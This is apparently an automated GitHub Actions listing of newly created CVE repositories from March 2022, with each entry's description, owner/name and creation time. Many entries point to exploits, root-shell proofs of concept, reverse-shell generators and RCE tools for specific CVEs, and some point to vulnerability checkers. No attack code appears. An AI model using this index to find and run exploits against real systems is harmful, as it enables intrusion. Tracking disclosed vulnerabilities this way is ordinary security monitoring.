Automatic monitor github cve using Github Actions
update time: 2022-03-28 18:29:03.239446 total: 8744
Exploit for CVE-2022-27666 : plummm/CVE-2022-27666 create time: 2022-03-23T22:54:28Z
Suzuki connect app is used to get the car information like Fuel, Ignition status, Current location, Seat buckle status etc. In Ignis, Zeta variant car if the Fuel CAN messages and Seat buckle status is spoofed via OBD 2 port with the crafted value (e.g. zero percent fuel and Car seat is buckled ), then the same value is reflected on Suzuki connect app, which can mislead the user. : nsbogam/CVE-2022-26269 create time: 2022-03-28T17:10:24Z
no description : puckiestyle/CVE-2021-41773 create time: 2022-03-28T11:02:46Z
no description : misterxid/watchguard_cve-2022-26318 create time: 2022-03-28T10:53:38Z
no description : Tankirat/CVE-2017-5638 create time: 2022-03-28T07:58:31Z
Check and report for cve_2022_23307 (log4shell) on your system. : buluma/ansible-role-cve_2022-23307 create time: 2022-03-28T08:20:31Z
no description : Gaphuang/CVE-2022-10086-TEST- create time: 2022-03-28T07:41:53Z
CVE-2022-27927 Microfinance Management System V1.0 SQL Injection Vulnerability : erengozaydin/Microfinance-Management-System-V1.0-SQL-Injection-Vulnerability-Unauthenticated create time: 2022-03-27T08:17:47Z
Description of Exploit SMBGhost CVE-2020-0796 : vsai94/ECE9069_SMBGhost_Exploit_CVE-2020-0796- create time: 2022-03-28T04:58:17Z
introduction to hacking second presentation : mehrzad1994/CVE-2021-21193 create time: 2022-03-28T03:51:58Z
no description : chattopadhyaykittu/CVE-2017-0037 create time: 2022-03-28T01:19:58Z
CVE 2020-1034 exploit and presentation : GeorgyFirsov/CVE-2020-1034 create time: 2022-03-23T19:14:26Z
Pasos a seguir para explotar la vulnerabilidad CVE-2021-27928 : GatoGamer1155/CVE-2021-27928 create time: 2022-03-27T23:46:36Z
no description : N3w-elf/CVE-2021-41773- create time: 2022-03-27T20:10:30Z
Watchguard RCE POC CVE-2022-26318 : Throns1956/watchguard_cve-2022-26318 create time: 2022-03-27T12:51:19Z
CVE-2022-0995 exploit : Bonfee/CVE-2022-0995 create time: 2022-03-26T21:46:09Z
Fake WPS Update Server PoC : MagicPiperSec/WPS-CVE-2022-24934 create time: 2022-03-27T07:47:10Z
no description : warmachine-57/CVE-2021-44117 create time: 2022-03-27T05:50:34Z
no description : sreeram281997/CVE-2022-21668-Pipenv-RCE-vulnerability create time: 2022-03-26T22:50:36Z
no description : tzwlhack/CVE-2021-4034 create time: 2022-03-26T14:30:11Z
no description : sysenter-eip/CVE-2022-26629 create time: 2022-03-26T06:06:05Z
no description : scopion/CVE-2022-26629 create time: 2022-03-25T06:16:09Z
Poc : tmoneypenny/CVE-2022-0847 create time: 2022-03-22T03:17:51Z
POC for CVE-2022-23648 : raesene/CVE-2022-23648-POC create time: 2022-03-25T19:43:59Z
CVE 2022-0847 : Patocoh/Research-Dirty-Pipe create time: 2022-03-25T16:27:40Z
Container Excape PoC for CVE-2022-0847 "DirtyPipe" : DataDog/dirtypipe-container-breakout-poc create time: 2022-03-09T19:38:44Z
no description : tzwlhack/CVE-2018-20250 create time: 2022-03-25T13:02:41Z
poc for CVE-2022-22947 : Nathaniel1025/CVE-2022-22947 create time: 2022-03-25T12:43:53Z
CVE-2019-0708 (BlueKeep) proof of concept allowing pre-auth RCE on Windows7 : RICSecLab/CVE-2019-0708 create time: 2020-03-15T19:33:53Z
CVE-2022-24934 : shakeman8/CVE-2022-24934 create time: 2022-03-25T07:13:17Z
no description : sysenter-eip/CVE-2022-26629 create time: 2022-03-25T04:58:20Z
no description : Jiang59991/cve-2021-21300-plus create time: 2022-03-25T02:59:41Z
no description : spasm5/CVE-2018-12326 create time: 2022-03-25T01:44:26Z
A quick python exploit for the Nostromo 1.9.6 remote code execution vulnerability. Only takes in host and port of web server as required arguments. : alexander-fernandes/CVE-2019-16278 create time: 2022-03-24T12:06:55Z
no description : nxtexploit/CVE-2020-3580 create time: 2022-03-24T09:34:04Z
CVE-2021-40373 - remote code execution : maikroservice/CVE-2021-40373 create time: 2021-08-31T13:03:10Z
no description : the-valluvarsploit/CVE-2018-6574 create time: 2022-03-24T08:40:42Z
This is a exploit code for CVE-202-8163 : TKLinux966/CVE-2020-8163 create time: 2022-03-24T06:43:39Z
CVE-2022-0185 analysis write up : chenaotian/CVE-2022-25636 create time: 2022-03-24T07:04:55Z
CVE-2021-44529 PoC : jkana/CVE-2021-44529 create time: 2022-03-24T03:58:16Z
no description : buff07/CVE-2022-10249 create time: 2022-03-24T02:09:28Z
PoC for vulnerability in Honda's Remote Keyless System(CVE-2022-27254) : nonamecoder/CVE-2022-27254 create time: 2022-03-23T15:03:09Z
no description : mtthwstffrd/berdav-CVE-2021-4034 create time: 2022-03-23T11:08:20Z
Proof-of-concept exploit for CVE-2016-1827 on OS X Yosemite. : domain9065v/bazad3 create time: 2022-03-23T06:02:52Z
no description : buff07/CVE-2022-24294 create time: 2022-03-23T06:26:02Z
no description : buff07/CVE-2022-24293 create time: 2022-03-23T06:25:56Z
no description : buff07/CVE-2022-24292 create time: 2022-03-23T06:25:45Z
Windows AppContainer Firewall Rules Security Feature Bypass Vulnerability CVE-2021-41338 Security Vulnerability Released: Oct 12, 2021 Assigning CNA: Microsoft MITRE CVE-2021-41338 CVSS:3.1 5.5 / 5.0 Attack Vector Local Attack Complexity Low Privileges Required Low User Interaction None Scope Unchanged Confidentiality High Integrity None Availability None Exploit Code Maturity Proof-of-Concept Remediation Level Official Fix Report Confidence Confirmed Please see Common Vulnerability Scoring System for more information on the definition of these metrics. Exploitability The following table provides an exploitability assessment for this vulnerability at the time of original publication. Yes No Exploitation Less Likely : Mario-Kart-Felix/firewall-cve create time: 2022-03-22T22:53:32Z
Chamilo LMS v1.11.14 was discovered to contain a zero click code injection vulnerability which allows attackers to execute arbitrary code via a crafted plugin. This vulnerability is triggered through user interaction with the attacker's profile page. : febinrev/CVE-2021-46398_Chamilo-LMS-RCE create time: 2022-03-22T17:35:38Z
CVE-2022-24990 TerraMaster TOS unauthenticated RCE via PHP Object Instantiation : 0xf4n9x/CVE-2022-24990 create time: 2022-03-20T05:15:16Z
CVE-2021-43530 A Universal XSS vulnerability was present in Firefox for Android resulting from improper sanitization when processing a URL scanned from a QR code. This bug only affects Firefox for Android. Other operating systems are unaffected.. This vulnerability affects Firefox < 94. : hfh86/CVE-2021-43530-UXSS-On-QRcode-Reader- create time: 2022-03-22T07:07:42Z
Improper Access Control to Remote Code Execution in GitHub repository webmin/webmin prior to 1.990. : cryst4lliz3/CVE-2022-0824 create time: 2022-03-22T03:49:51Z
no description : Enokiy/cve-2022-22947-springcloud-gateway create time: 2022-03-21T23:37:20Z
no description : SivaPriyaRanganatha/CVE-2020-6418 create time: 2022-03-21T23:05:38Z
Reproduction of CVE-2020-36518 in Spring Boot 2.5.10 : ghillert/boot-jackson-cve create time: 2022-03-21T21:13:28Z
no description : yazan828/CVE-2017-1000004 create time: 2022-03-21T13:35:38Z
no description : wy17/CVE-2022-1997 create time: 2022-03-21T15:00:48Z
no description : T4t4ru/CVE-2018-16845 create time: 2022-03-21T13:15:07Z
Simple webhook to block exploitation of CVE-2022-0811 : spiarh/webhook-cve-2022-0811 create time: 2022-03-21T09:39:22Z
Dirty Cow CVE-2016-5195 Vulnerability : gurpreetsinghsaluja/dirtycow create time: 2022-03-21T08:35:21Z
no description : Anonymous-Family/CVE-2015-1701-download create time: 2022-03-21T06:39:18Z
no description : Anonymous-Family/CVE-2015-1701 create time: 2022-03-21T06:26:21Z
no description : LTiDi2000/CVE-2020-2551 create time: 2022-03-21T03:58:29Z
pwncat module that automatically exploits CVE-2022-0847 (dirtypipe) : DanaEpp/pwncat_dirtypipe create time: 2022-03-20T23:02:43Z
Python3 implementation of CVE 2013-0156 : Atreb92/CVE-2013-0156 create time: 2022-03-20T19:22:24Z
Apache APISIX < 2.12.1 Remote Code Execution and Docker Lab : twseptian/cve-2022-24112 create time: 2022-03-20T16:35:55Z
RCE exploit for CVE-2017-9841 : akr3ch/CVE-2017-9841 create time: 2022-03-20T07:01:52Z
CVE-2022-24990信息泄露+RCE 一条龙 : lishang520/CVE-2022-24990 create time: 2022-03-20T05:21:08Z
CVE-2022-22600 Proof of Concept : KlinKlinKlin/MSF-screenrecord-on-MacOS create time: 2022-03-19T04:13:52Z
0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020/2021 CVE-2021-2119 : chatbottesisgmailh/Sauercloude create time: 2022-03-20T03:17:03Z
no description : mtthwstffrd/saleemrashid-sudo-cve-2019-18634 create time: 2022-03-20T01:39:22Z
CVE-2022-24086 and CVE-2022-24087 exploits proof of concept : Sam00rx/CVE-2022-24087 create time: 2022-03-19T23:33:24Z
Remote Code Execution in LocalStack 0.12.6 : TheCyberGeek/CVE-2022-27251 create time: 2022-03-19T20:49:56Z
Documentation and proof of concept code for CVE-2022-24126. : tremwil/ds3-nrssr-rce create time: 2022-01-28T20:37:14Z
CVE-2020-0890 | Windows Hyper-V Denial of Service Vulnerability proof-of-concept code : skasanagottu57gmailv/gerhart01 create time: 2022-03-19T15:47:10Z
WAMpage - A WebOS root LPE exploit chain (CVE-2022-23731) : DavidBuchanan314/WAMpage create time: 2021-12-26T04:29:09Z
PoC for CVE-2017-0075 : belyakovvitagmailt/4B5F5F4Bp create time: 2022-03-19T13:18:12Z
Exploit for CVE-2021_33751 used in PWN2OWN2021 : 1N1T1A/pwn2own_exploit create time: 2022-03-19T11:39:46Z
🎩 🤟🏻 [P1-$10,000] Google Chrome, Microsoft Edge and Opera - vulnerability reported by Maciej Pulikowski - System environment variables leak - CVE-2022-0337 : Puliczek/CVE-2022-0337-PoC-Google-Chrome-Microsoft-Edge-Opera create time: 2022-03-19T08:10:46Z
PoC for Dirty COW (CVE-2016-5195) : vinspiert/scumjrs create time: 2022-03-19T02:18:40Z
PoC for CVE-2021-28476 a guest-to-host "Hyper-V Remote Code Execution Vulnerability" in vmswitch.sys. : 2273852279qqs/0vercl0k create time: 2022-03-19T01:33:04Z
TOP All bugbounty pentesting CVE-2022- POC Exp Things : hktalent/TOP create time: 2022-03-19T01:54:15Z
CVE-2022-22600 Proof of Concept : acheong08/MSF-screenrecord-on-MacOS create time: 2021-12-22T05:03:29Z
Exploit for CVE-2022-27226 : SakuraSamuraii/ez-iRZ create time: 2022-03-16T17:45:12Z
Hacked up Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn a root shell. (and attempts to restore the damaged binary as well) : LudovicPatho/CVE-2022-0847 create time: 2022-03-18T22:51:02Z
Redis沙盒逃逸漏洞复现(CVE-2022-0543) : Newbee740/REDIS-CVE-2022-0543 create time: 2022-03-18T17:15:19Z
A Path traversal vulnerability in the file upload functionality in tinyfilemanager.php in Tiny File Manager Project’s Tiny File Manager <= 2.4.3 allows remote attackers with valid user accounts to upload malicious PHP files to the webroot and achieve code execution on the target server. : febinrev/CVE-2021-45010-TinyFileManager-Exploit create time: 2022-03-18T14:00:03Z
A test app to check if your device is vulnerable to CVE-2021-30955 : GeoSn0w/Pentagram-exploit-tester create time: 2022-03-18T12:32:10Z
CVE-2022-22947 memshell : viemsr/spring_cloud_gateway_memshell create time: 2022-03-18T07:17:17Z
Local privilege escalation for OS X 10.10.5 via CVE-2016-1828. : berritus163t/bazad5 create time: 2022-03-18T06:59:32Z
no description : tzwlhack/CVE-2017-11882 create time: 2022-03-18T05:38:39Z
CVE-2021-3156 : RodricBr/CVE-2021-3156 create time: 2022-03-18T00:05:48Z
node-ipc is malware / protestware! : scriptzteam/node-ipc-malware-protestware-CVE-2022-23812 create time: 2022-03-17T16:49:22Z
Kibana <6.6.0 RCE written in python3 : Cr4ckC4t/cve-2019-7609 create time: 2022-03-17T15:33:33Z
GLPI automatic exploitation tool for CVE-2020-15175 : Xn2/GLPwn create time: 2022-03-14T13:51:17Z
A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability. : LP-H4cmilo/CVE-2022-0847_DirtyPipe_Exploits create time: 2022-03-17T11:01:48Z
exploits XAR – Arbitrary File Write : poizon-box/CVE-2022-22582 create time: 2022-03-17T10:16:27Z
no description : Wrin9/CVE-2022-22947 create time: 2022-03-17T09:12:51Z
Apache APISIX 2.12.1 Remote Code Execution by IP restriction bypass and using default admin AIP token : kavishkagihan/CVE-2022-24112-POC create time: 2022-03-17T08:22:54Z
CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation. : xigexbh/bazad1 create time: 2022-03-17T03:38:01Z
no description : Jiang59991/cve-2021-21300 create time: 2022-03-17T02:37:58Z
Local Privilege Escalation (LPE) vulnerability found on Polkit's pkexec utility : Hifumi1337/CVE-2021-4034 create time: 2022-03-16T23:05:53Z
A years old exploit of a local EoP vulnerability in Kingsoft Antivirus KWatch Driver version 2009.3.17.77. : tandasat/CVE-2022-25949 create time: 2022-03-16T14:42:21Z
Exploitation of CVE-2020-256480 using scapy : dim0x69/cve-2022-25640-exploit create time: 2022-03-16T14:59:08Z
IoT CVEs as abnormal events to evaluate a real-time host-based IDS. https://doi.org/10.1016/j.future.2022.03.001 : InesMartins31/iot-cves create time: 2019-10-09T20:41:50Z
no description : Jiang59991/cve-2021-21300 create time: 2022-03-16T13:36:02Z
[CVE-2021-21983] VMware vRealize Operations (vROps) Manager File Path Traversal Leads to Remote Code Execution (RCE) : murataydemir/CVE-2021-21983 create time: 2022-03-16T11:56:25Z
no description : pazhanivel07/frameworks_base-CVE-2021-0595 create time: 2022-03-16T11:07:36Z
no description : pazhanivel07/Settings-CVE-2021-0595 create time: 2022-03-16T10:59:58Z
no description : Jiang59991/cve-2021-21300 create time: 2022-03-16T10:56:23Z
no description : si1ent-le/CVE-2019-5736 create time: 2022-03-16T09:22:20Z
no description : Jiang59991/cve-2021-21300 create time: 2022-03-16T09:28:29Z
Exploit tool for Adminer 1.0 up to 4.6.2 Arbitrary File Read vulnerability : p0dalirius/CVE-2021-43008-AdminerRead create time: 2021-12-13T17:26:49Z
no description : sinsinology/CVE-2022-26503 create time: 2022-03-16T09:54:16Z
Apache APISIX Remote Code Execution (CVE-2022-24112) proof of concept exploit : M4xSec/Apache-APISIX-CVE-2022-24112 create time: 2022-03-16T09:19:12Z
CVE-2022-0543_RCE,Redis Lua沙盒绕过 命令执行 : aodsec/CVE-2022-0543 create time: 2022-03-16T06:41:50Z
Exploring and exploiting CVE-2022-0778. : BobTheShoplifter/CVE-2022-0778-POC create time: 2022-03-16T06:29:42Z
Proof of concept for CVE-2022-0778, which triggers an infinite loop in parsing X.509 certificates due to a bug in BN_mod_sqrt : drago-96/CVE-2022-0778 create time: 2022-03-15T19:06:33Z
CVE-2018-11235: Git Submodule RCE : SenSecurity/exploit create time: 2022-03-15T17:33:22Z
no description : W0rty/CVE-2021-39165 create time: 2022-03-15T18:14:46Z
Simple python script to exploit Vsftpd 2.3.4 Backdoor Command Execution (CVE-2011-2523) : PrestaDZ/vsftpd-2.3.4 create time: 2022-03-15T13:39:19Z
no description : dmlino/cve-2018-6574 create time: 2022-03-15T14:11:57Z
desc_race exploit for iOS 15.0 - 15.1.1 (with stable kernel r/w primitives) (CVE-2021-30955) : Dylbin/desc_race create time: 2022-03-15T13:30:38Z
Python script to check if your kernel is vulnerable to Dirty pipe CVE-2022-0847 : MrP1xel/CVE-2022-0847-dirty-pipe-kernel-checker create time: 2022-03-15T11:25:19Z
no description : bysinks/CVE-2021-29441 create time: 2022-03-15T08:53:59Z
no description : phuonguno98/CVE-2022-0847-DirtyPipe-Exploits create time: 2022-03-15T08:54:38Z
no description : bysinks/CVE-2022-22947 create time: 2022-03-15T08:50:13Z
no description : githublihaha/DirtyPIPE-CVE-2022-0847 create time: 2022-03-15T08:33:19Z
no description : Mani1325/ka-cve-2021-21341 create time: 2022-03-15T07:28:52Z
no description : phuonguno98/CVE-2022-0847 create time: 2022-03-15T06:06:31Z
Proof of concept app for Android permanent denial-of-service vulnerability, CVE-2020-0443 : Supersonic/CVE-2020-0443 create time: 2022-03-15T04:54:31Z
no description : k0zulzr/CVE-2022-24086-RCE create time: 2022-03-15T05:11:23Z
pkexec --> privilege escalation : TomSgn/CVE-2021-4034 create time: 2022-03-14T22:42:49Z
Implementation of CVE-2022-0847 as a shellcode : Shotokhan/cve_2022_0847_shellcode create time: 2022-03-14T22:54:15Z
CVE-2022-24122 Proof of Concept : meowmeowxw/CVE-2022-24122 create time: 2022-03-10T15:20:04Z
Exploit for the Rails CVE-2019-5420 : trickstersec/CVE-2019-5420 create time: 2022-03-14T17:29:47Z
PoC for CVE-2021-33193 : jeremy-cxf/CVE-2021-33193 create time: 2022-03-14T17:30:22Z
no description : Fa1c0n35/CVE-2021-41773 create time: 2022-03-14T16:43:49Z
Exploits for Hotel Druid 3.0.3 - Remote Code Execution (RCE) CVE-2022-22909 : kaal18/CVE-2022-22909 create time: 2022-03-14T17:10:08Z
CVE-2022-0847 POC : breachnix/dirty-pipe-poc create time: 2022-03-14T15:32:25Z
no description : p0ch4t/CVE-2022-0867 create time: 2022-03-14T14:19:28Z
dirtypipe : CYB3RK1D/CVE-2022-0847 create time: 2022-03-14T13:21:25Z
CVE-2021-30955 iOS 15.1.1 POC for 6GB RAM devices (A14-A15) : markie-dev/desc_race_A15 create time: 2022-03-14T06:42:45Z
Oracle Access Manager Unauthenticated Attacker Vulnerability CVE-2021-35587 : antx-code/CVE-2021-35587 create time: 2022-03-14T05:03:54Z
no description : cryst4lliz3/CVE-2021-44228-vuln-app create time: 2022-03-14T04:13:13Z
no description : cryst4lliz3/CVE-2021-44228 create time: 2022-03-14T04:09:36Z
no description : cryst4lliz3/CVE-2021-22205 create time: 2022-03-14T04:09:18Z
no description : cryst4lliz3/CVE-2021-41773 create time: 2022-03-14T04:08:56Z
no description : cryst4lliz3/CVE-2021-42013 create time: 2022-03-14T04:08:24Z
OPEN AND READ JSON : StepOK10/CVE.NVD.NIST2202-2002 create time: 2022-03-13T21:01:21Z
CVE-2021-4034 (PWNKIT). A memory corruption vulnerability in Polkit's pkexec, which allows any unprivileged user to gain full root privileges on a vulnerable system using default polkit configuration. : Nel0x/pwnkit-vulnerability create time: 2022-03-13T20:24:59Z
Dirty Pipe (CVE-2022-0847) zafiyeti kontrolü : realbatuhan/dirtypipetester create time: 2022-03-13T19:30:14Z
no description : micha3lcve/LOG4J-mass-rce-CVE-2021-44228 create time: 2022-03-13T15:23:49Z
spring-cloud-gateway-rce CVE-2022-22947 : k3rwin/spring-cloud-gateway-rce create time: 2022-03-13T10:00:21Z
no description : Kashiki078/CVE-2021-4034 create time: 2022-03-13T07:40:56Z
CVE-2022-0847 (Dirty Pipe) is an arbitrary file overwrite vulnerability that allows escalation of privileges by modifying or overwriting arbitrary read-only files e.g. /etc/passwd, /etc/shadow. : sa-infinity8888/Dirty-Pipe-CVE-2022-0847 create time: 2022-03-13T05:51:06Z
Apache2 2.4.49 - LFI & RCE Exploit - CVE-2021-41773 : thehackersbrain/CVE-2021-41773 create time: 2022-03-12T21:24:55Z
A collection of exploits and documentation that can be used to exploit the Linux Dirty Pipe vulnerability. : AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits create time: 2022-03-12T20:57:24Z
my personal exploit of CVE-2022-0847(dirty pipe) : arttnba3/CVE-2022-0847 create time: 2022-03-12T11:31:46Z
Small PoC of CVE-2021-41773 : the29a/CVE-2021-41773 create time: 2022-03-11T21:50:35Z
Script en python para crear imagenes maliciosas (reverse shell) : GatoGamer1155/CVE-2021-22204 create time: 2022-03-11T19:02:28Z
Seowon SLR-120S42G RCE Exploit / Remote Code Execution (Unauthenticated) : TAPESH-TEAM/CVE-2020-17456-Seowon-SLR-120S42G-RCE-Exploit-Unauthenticated create time: 2022-03-11T00:16:35Z
Script en python para crear imagenes maliciosas (reverse shell) : GatoGamer1155/CVE-2021-22204 create time: 2022-03-11T17:31:07Z
no description : frarinha/CVE-2018-6574 create time: 2022-03-11T13:40:22Z
LPE on linux kernel based on CVE-2017-14954, CVE-2017-18344, CVE-2017-5123 : echo-devim/exploit_linux_kernel4.13 create time: 2022-03-11T12:54:10Z
MSF Module CVE-2018-15727 : svnsyn/CVE-2018-15727 create time: 2022-03-11T13:20:19Z
Log4j2组件命令执行RCE / Code By:Jun_sheng : Jun-5heng/CVE-2021-44228 create time: 2022-03-11T12:43:15Z
no description : sakib570/CVE-2018-1263-Demo create time: 2022-03-11T12:07:16Z
Log4j2组件命令执行RCE / Code By:Jun_sheng : Jun-5heng/CVE-2021-44228 create time: 2022-03-11T10:08:12Z
A Python-based DirtyPipe (CVE-2022-0847) POC to pop a root shell : crusoe112/DirtyPipePython create time: 2022-03-11T08:22:56Z
CVE-2022-0492 EXP and Analysis write up : chenaotian/CVE-2022-0492 create time: 2022-03-11T08:02:46Z
no description : dskmehra/CVE-2022-0848 create time: 2022-03-11T07:26:04Z
MetaBase 任意文件读取 : Chen-ling-afk/CVE-2021-41277 create time: 2022-03-11T06:39:38Z
no description : Greetdawn/CVE-2022-0847-DirtyPipe- create time: 2022-03-11T02:51:54Z
cve-2022-22947-docker : hh-hunter/cve-2022-22947-docker create time: 2022-03-11T01:27:55Z
no description : VVeakee/CVE-2022-24990-EXP create time: 2022-03-11T01:06:26Z
CVE-2022-0847 Python exploit to get root or write a no write permission, immutable or read-only mounted file. : terabitSec/dirtyPipe-automaticRoot create time: 2022-03-10T20:15:07Z
About Script en python sobre la vulnerabilidad CVE-2021-3156 : GatoGamer1155/CVE-2021-3156 create time: 2022-03-10T19:10:28Z
no description : michaelklaan/CVE-2022-0847-Dirty-Pipe create time: 2022-03-10T16:09:16Z
no description : michaelklaan/CVE-2022-22947-Spring-Cloud create time: 2022-03-10T16:08:23Z
HERRAMIENTA AUTOMATIZADA PARA LA DETECCION DE LA VULNERABILIDAD CVE-2021-44228 : MiguelM001/vulescanjndilookup create time: 2022-03-10T14:57:30Z
CVE-2022-0847 Linux kernel LPE POC : akecha/Dirty-pipe create time: 2022-03-10T14:02:30Z
CVE-2022-0847-DirtyPipe-Exploit : V0WKeep3r/CVE-2022-0847-DirtyPipe-Exploit create time: 2022-03-10T13:23:52Z
no description : mohamedimthiyaj/cve-2018 create time: 2022-03-10T11:20:39Z
no description : ByteHackr/CVE-2022-0853 create time: 2022-03-10T09:10:56Z
no description : PaoPaoLong-lab/Spring-CVE-2022-22947- create time: 2022-03-10T06:01:32Z
CVE-2021-44228 in Container : cryst4lliz3/CVE-2021-44228 create time: 2022-03-10T04:32:07Z
no description : PaoPaoLong-lab/Spring-Cloud-Gateway-CVE-2022-22947- create time: 2022-03-10T05:07:59Z
CVE-2022-22947 Exploit script : An0th3r/CVE-2022-22947-exp create time: 2022-03-10T03:51:47Z
仅仅是poc,并不是exp : VVeakee/CVE-2022-24990-POC create time: 2022-03-10T03:16:04Z
no description : babyshen/CVE-2019-13272 create time: 2022-03-10T01:27:46Z
CVE-2022-0847 POC and Docker and Analysis write up : chenaotian/CVE-2022-0847 create time: 2022-03-10T01:27:29Z
no description : edsonjt81/CVE-2021-4034-Linux create time: 2022-03-10T01:24:14Z
no description : edsonjt81/CVE-2022-0847-Linux create time: 2022-03-10T01:18:26Z
A root exploit for CVE-2022-0847 (Dirty Pipe) : babyshen/CVE-2022-0847 create time: 2022-03-10T00:54:11Z
Exploits CVE-2022-22588 vulnerability on iOS 15.2 and lower. Provided for research purposes only. : trevorspiniolas/homekitdos create time: 2022-01-01T07:38:48Z
no description : T4t4ru/CVE-2022-0847 create time: 2022-03-09T16:47:36Z
Dirty Pipe POC : gyaansastra/CVE-2022-0847 create time: 2022-03-09T15:44:58Z
ThinkAdmin CVE-2020-25540 POC : Rajchowdhury420/ThinkAdmin-CVE-2020-25540 create time: 2022-03-09T13:08:31Z
Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well) : nanaao/Dirtypipe-exploit create time: 2022-03-09T07:16:57Z
no description : pentestblogin/pentestblog-CVE-2022-0847 create time: 2022-03-09T10:24:42Z
no description : qjh2333/CVE-2019-10999 create time: 2022-03-09T09:35:15Z
no description : AyoubNajim/cve-2022-0847dirtypipe-exploit create time: 2022-03-09T10:05:53Z
Polkit's Pkexec CVE-2021-4034 Proof Of Concept and Patching : ITMarcin2211/Polkit-s-Pkexec-CVE-2021-4034 create time: 2022-03-09T08:44:02Z
no description : Mustafa1986/CVE-2022-0847-DirtyPipe-Exploit create time: 2022-03-09T05:22:20Z
Dirty Pipe (CVE-2022-0847) PoC that hijacks a SUID binary to spawn. a root shell. (and attempts to restore the damaged binary as well) : MRNIKO1/Dirtypipe-exploit create time: 2022-03-09T04:42:59Z
no description : tuo4n8/CVE-2020-28653 create time: 2021-07-31T13:00:15Z
CVE-2022-0847 : Al1ex/CVE-2022-0847 create time: 2022-03-09T02:47:08Z
no description : Greetdawn/CVE-2022-0847-DirtyPipe create time: 2022-03-09T02:47:06Z
Springboot web application accepts a name get parameter and logs its value to log4j2. Vulnerable to CVE-2021-44228. : paulvkitor/log4shellwithlog4j2_13_3 create time: 2022-03-09T02:29:58Z
no description : bakhtiyarsierad/CVE-2021-4034-bug-root create time: 2022-03-09T02:04:07Z
A “Dirty Pipe” vulnerability with CVE-2022-0847 and a CVSS score of 7.8 has been identified, affecting Linux Kernel 5.8 and higher. The vulnerability allows attackers to overwrite data in read-only files. Threat actors can exploit this vulnerability to privilege themselves with code injection. : dadhee/CVE-2022-0847_DirtyPipeExploit create time: 2022-03-09T01:55:04Z
This script exploits CVE-2021-41773 to print file or/and execute command. : mauricelambert/CVE-2021-41773 create time: 2022-03-08T21:55:53Z
This script exploits CVE-2021-42013 to print file or/and execute command. : mauricelambert/CVE-2021-42013 create time: 2022-03-08T21:48:40Z
Script en python sobre la vulnerabilidad CVE-2021-3560 : GatoGamer1155/CVE-2021-3560 create time: 2022-03-08T20:27:00Z
Script en python sobre la vulnerabilidad CVE-2021-4034 : GatoGamer1155/CVE-2021-4034 create time: 2022-03-08T20:12:38Z
CVE-2022-0847 : 4luc4rdr5290/CVE-2022-0847 create time: 2022-03-08T20:18:28Z
no description : chompie1337/Linux_LPE_io_uring_CVE-2021-41073 create time: 2022-03-02T19:07:37Z
A script to exploit CVE-2020-14144 - GiTea authenticated Remote Code Execution using git hooks : p0dalirius/CVE-2020-14144-GiTea-git-hooks-rce create time: 2022-03-08T17:14:27Z
Bash script to check for CVE-2022-0847 "Dirty Pipe" : basharkey/CVE-2022-0847-dirty-pipe-checker create time: 2022-03-08T17:13:24Z
CVE-2022-24112: Apache APISIX Remote Code Execution Vulnerability : Mah1ndra/CVE-2022-244112 create time: 2022-03-08T17:08:52Z
Docker exploit : mrchucu1/CVE-2022-0847-Docker create time: 2022-03-08T17:02:40Z
no description : ITMarcin2211/CVE-2022-0847-DirtyPipe-Exploit create time: 2022-03-08T15:33:39Z
Implementation of Max Kellermann's exploit for CVE-2022-0847 : 0xIronGoat/dirty-pipe create time: 2022-03-08T15:30:45Z
no description : puckiestyle/CVE-2022-0847 create time: 2022-03-08T14:46:21Z
The Dirty Pipe Vulnerability : knqyf263/CVE-2022-0847 create time: 2022-03-08T13:48:55Z
CVE-2022-25943 : HadiMed/KINGSOFT-WPS-Office-LPE create time: 2021-07-09T23:34:57Z
CVE-2022-0847: Linux Kernel Privilege Escalation Vulnerability : ahrixia/CVE_2022_0847 create time: 2022-03-08T12:43:43Z
CVE-2022-0847 DirtyPipe Exploit. : febinrev/dirtypipez-exploit create time: 2022-03-08T11:49:40Z
An exploit for CVE-2022-0847 dirty-pipe vulnerability : cspshivam/CVE-2022-0847-dirty-pipe-exploit create time: 2022-03-08T10:40:07Z
调试代码包含断点信息,直接导入即可进行调试 : ba1ma0/Spring-Cloud-GateWay-CVE-2022-22947-demon-code create time: 2022-03-08T10:07:54Z
CVE-2022-22947_EXP,CVE-2022-22947_RCE,CVE-2022-22947反弹shell,CVE-2022-22947 getshell : aodsec/CVE-2022-22947 create time: 2022-03-08T09:32:36Z
no description : zhangweijie11/CVE-2020-17519 create time: 2022-03-08T09:19:27Z
Linux Kernel Local Privilege Escalation Vulnerability CVE-2022-0847. : antx-code/CVE-2022-0847 create time: 2022-03-08T09:10:51Z
A python implementation of the Dirty Pipe exploit that adds an unprivliged user to the sudoers group. : eremus-dev/CVE-2016-5195-sudo-poc create time: 2022-03-08T07:17:39Z
CVE-2022-0487 : si1ent-le/CVE-2022-0847 create time: 2022-03-08T04:51:02Z
Script en python de la vulnerabilidad CVE-2021-4034 : GatoGamer1155/CVE-2021-4034 create time: 2022-03-08T03:55:05Z
no description : rahul1406/cve-2022-0847dirtypipe-exploit create time: 2022-03-08T03:56:03Z
Script en python de la vulnerabilidad CVE-2021-4034 : GatoGamer1155/CVE-2021-4034 create time: 2022-03-08T02:05:43Z
CVE-2022-24990:TerraMaster TOS 通过 PHP 对象实例化执行未经身份验证的远程命令 : Jaky5155/CVE-2022-24990-TerraMaster-TOS--PHP- create time: 2022-03-08T01:28:32Z
no description : lucksec/CVE-2022-0847 create time: 2022-03-08T01:17:09Z
CVE-2022-0847 exploit one liner : carlosevieira/Dirty-Pipe create time: 2022-03-07T20:57:34Z
66666 : 2xYuan/CVE-2022-0847 create time: 2022-03-07T19:56:37Z
CVE-2022-21907: exploitation with Powershell, Python, Ruby, NMAP and Metasploit. : mauricelambert/CVE-2021-31166 create time: 2022-03-07T18:56:52Z
A root exploit for CVE-2022-0847 : Arinerron/CVE-2022-0847-DirtyPipe-Exploit create time: 2022-03-07T18:55:20Z
CVE-2022-0847简单复现 : imfiver/CVE-2022-0847 create time: 2022-03-07T18:36:50Z
Script CVE-2021-4034 en python : GatoGamer1155/CVE-2021-4034 create time: 2022-03-07T15:10:32Z
